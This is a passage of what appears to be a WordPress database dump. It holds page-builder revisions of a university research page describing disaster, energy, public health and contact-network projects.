day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 10:44:09','2023-09-29 14:44:09','',438,'https://gsudice.dataconn.net/?p=1516',0,'revision','',0),(1517,1,'2023-09-29 10:44:09','2023-09-29 14:44:09','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n            <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n            <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-392 style-local-126-c36\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Urban Scale Energy Assessments</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n                      in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n                      of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n                      patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n                      propose a plan for grid distribution optimized for human-centric usage and need.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n            <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-356 style-local-126-c17\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n                      documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n                      of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n                      two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n            <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n            <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n            <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-364 style-local-126-c24\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">The DICE Data Repository </h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n                      of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n                      ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp;\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n            <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-384 style-local-126-c29\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Orpheus</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n                      the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n                      can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n            <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n            <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n            <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-350 style-local-126-c12\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">GSU Contact Network Prediction</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects&nbsp;our approach to this\n                      research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n                      to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n                      account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n                      to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:44:09','2023-09-29 14:44:09','',126,'https://gsudice.dataconn.net/?p=1517',0,'revision','',0),(1523,1,'2023-09-29 10:45:09','2023-09-29 14:45:09','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings  to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp; <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"ORPHEUS\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects&nbsp;our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 10:45:09','2023-09-29 14:45:09','',438,'https://gsudice.dataconn.net/?p=1523',0,'revision','',0),(1524,1,'2023-09-29 10:45:09','2023-09-29 14:45:09','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n            <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n            <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-392 style-local-126-c36\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Urban Scale Energy Assessments</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n                      in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n                      of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n                      patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n                      propose a plan for grid distribution optimized for human-centric usage and need.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 